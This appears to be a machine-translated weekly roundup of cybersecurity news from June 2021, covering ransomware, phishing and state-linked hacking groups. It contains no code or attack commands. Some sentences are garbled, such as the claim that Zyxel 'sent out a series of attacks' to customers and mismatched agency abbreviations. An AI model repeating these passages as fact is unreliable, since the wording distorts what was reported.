Overview of security incidents for the period 19-25 June 2021
A team of information security specialists Microsoft Security Intelligence warned users about the ongoing malicious campaign BazaCall, whose operators are trying to install ransomware on victim systems. As part of the BazaCall campaign, criminals send out emails asking recipients to call a specified number to cancel an alleged subscription to the service. By calling the number, users are actually going to a fraudulent call centre run by attackers. The perpetrators recommend that victims visit a specific website and download a Microsoft Excel file to complete the procedure. The file, in turn, contains a malicious macro for downloading malware.
A number of organizations in the oil, gas and food sectors have received threatening emails from cybercriminals posing as DarkSide. According to researchers at Trend Micro, attackers are using the notorious DarkSide ransomware to launch a socially engineered intimidation campaign. In emails, criminals warn victims that the group has successfully compromised their corporate network and stolen confidential information. The stolen data will be publicly available unless the company pays a ransom of 100 bitcoins (roughly $ 3.8 million).
Trend Micro also warned of a new ransomware called DarkRadiation. The malware is designed to attack Red Hat / CentOS and Debian Linux distributions. Cybercriminals used Telegram messenger to communicate with the C&C server. The malware uses AES (Advanced Encryption Standard) symmetric block cipher algorithm with CBC mode to encrypt files in various directories. At this time, the methods used to spread the malware are unknown, and there is no evidence that the ransomware was used in actual attacks.
The ransomware Clop has made itself felt again, despite the arrests of members of the group by the Ukrainian police last week. So, on the site of leaks Clop, information about a new victim appeared. The published data are employee records of an unknown company, including proof of employment for loan applications and paperwork.
Liege, the third-largest city in Belgium, has also become a victim of ransomware. The attack destroyed the IT network and online services of the municipality. As a result, all appointments at the city administration, weddings, funerals and the issuance of birth certificates were cancelled, since civil servants lost access to the city’s IT network. Online forms for applying for permission to hold public events and parking were also unavailable.
The ransomware attack also targeted the Lucky Star casino network in Oklahoma. As cybersecurity experts suggest, since almost all casino games are now computerized in one way or another, the ransomware operators have caused a serious malfunction in the computer systems of the establishments.
Network equipment manufacturer Zyxel has sent out a series of attacks to its customers against Zyxel ‘s corporate firewalls and VPN servers. In particular, attackers attack multipurpose network devices of the USG, ZyWALL, USG FLEX, ATP and VPN series running on the ZLD firmware. At the moment, it is not clear how exactly attackers gain access to devices – using known vulnerabilities or exploiting previously unknown problems.
Daewoo Shipbuilding & Marine Engineering, a major South Korean shipbuilding company specializing in the production of naval vessels, has been hacked by unknown cybercriminals. The company reported the incident to the police, and law enforcement officials worked with the military to investigate the incident.
Black Lotus Labs has discovered a new ReverseRat remote access Trojan that targets government and energy organizations in South and Central Asia. Supposedly, the operating infrastructure of the cybercriminal group is located in Pakistan. Analyzing the campaign, experts have identified similarities with the techniques, tactics and procedures used in an operation called Operation SideCopy, organized by the Pakistani APT group Transparent Tribe last year. Whether the two groups are related, the experts did not clarify.
The research team of the Insikt Group of the information security company Recorded Future has identified a connection between the hacker group RedFoxtrot and the People’s Liberation Army of China, in particular with the Unit 69010 unit operating from Urumqi, the administrative center of the Xinjiang Uygur Autonomous Region. Unit 69010 is part of the Bureau of Technical Intelligence, a structure within the Strategic Support Force (SSS) under the China Network Systems Department. The MTR includes units responsible for space, cyber and electronic warfare.
The hackers of the Anonymous group accused the Peruvian authorities, in particular the interim president of the country Francisco Sagasti and the National Jury for Elections (JNE), of bias during the presidential elections and threatened the head of JNE Jorge Salas Arenas with the publication of incriminating evidence if he did not resign.
Catch up on more articles here
Follow us on Twitter here